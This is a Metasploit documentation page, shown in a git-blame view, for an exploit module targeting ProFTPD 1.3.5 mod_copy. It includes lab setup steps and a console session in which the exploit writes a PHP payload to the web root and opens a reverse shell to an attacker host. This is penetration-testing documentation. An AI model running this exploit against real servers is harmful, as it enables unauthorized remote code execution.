adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/documentation/modules/exploit/unix/ftp/proftpd_modcopy_exec.md
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

96 lines
2.9 KiB
Markdown
Raw Normal View History

exploit/unix/ftp/proftpd_modcopy_exec: Add docs and resolve RuboCop violations
2023-03-23 18:13:20 +11:00
## Vulnerable Application
This module exploits the SITE CPFR/CPTO mod_copy commands in ProFTPD version 1.3.5.
Any unauthenticated client can leverage these commands to copy files from any
part of the filesystem to a chosen destination. The copy commands are executed with
the rights of the ProFTPD service, which by default runs under the privileges of the
'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
directory, PHP remote code execution is made possible.
## Installation Steps
Download and build:
```sh
sudo apt install gcc make
wget ftp://ftp.proftpd.org/distrib/source/proftpd-1.3.5.tar.gz
tar zxvf proftpd-1.3.5.tar.gz
cd proftpd-1.3.5
./configure --with-modules=mod_copy
make
```
Run ProFTPD using the sample default configuration file (in foreground with `-n` flag for testing):
```
sudo ./proftpd -n -c "`pwd`/sample-configurations/basic.conf"
```
Set up a web server with a world-writable directory:
```
sudo apt install php apache2
sudo mkdir /home/var/www/html/test
sudo chmod 777 /var/www/html/test
```
## Verification Steps
1. Install the application
1. Start msfconsole
1. Do: `use exploit/unix/ftp/proftpd_modcopy_exec`
1. Do: `set rhosts <rhosts>`
1. Do: `set rport_ftp <remote ftp port>`
1. Do: `set tmppath <writable temporary file path>`
1. Do: `set sitepath <writable web server file path>`
1. Do: `run`
1. You should get a new session.
## Options
### RPORT_FTP
FTP port (default: `21`)
### TMPPATH
Absolute writable path (default: `/tmp`)
### SITEPATH
Absolute writable website path (default: `/var/www`)
## Scenarios
### ProFTPD 1.3.5 on Ubuntu 22.04
```
msf6 > use exploit/unix/ftp/proftpd_modcopy_exec
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set rhosts 192.168.200.158
rhosts => 192.168.200.158
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > check
[*] 192.168.200.158:80 - The target appears to be vulnerable. 192.168.200.158:21 - Unauthenticated SITE CPFR command was successful
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set sitepath /var/www/html/test
sitepath => /var/www/html/test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set targeturi /test
targeturi => /test
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf6 exploit(unix/ftp/proftpd_modcopy_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.158:80 - 192.168.200.158:21 - Connected to FTP server
[*] 192.168.200.158:80 - 192.168.200.158:21 - Sending copy commands to FTP server
[*] 192.168.200.158:80 - Executing PHP payload /test/EbzQzU.php
[+] 192.168.200.158:80 - Deleted /var/www/html/test/EbzQzU.php
[*] Command shell session 1 opened (192.168.200.130:4444 -> 192.168.200.158:46352) at 2023-03-19 00:22:49 -0400
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/var/www/html/test
```
Reference in New Issue Copy Permalink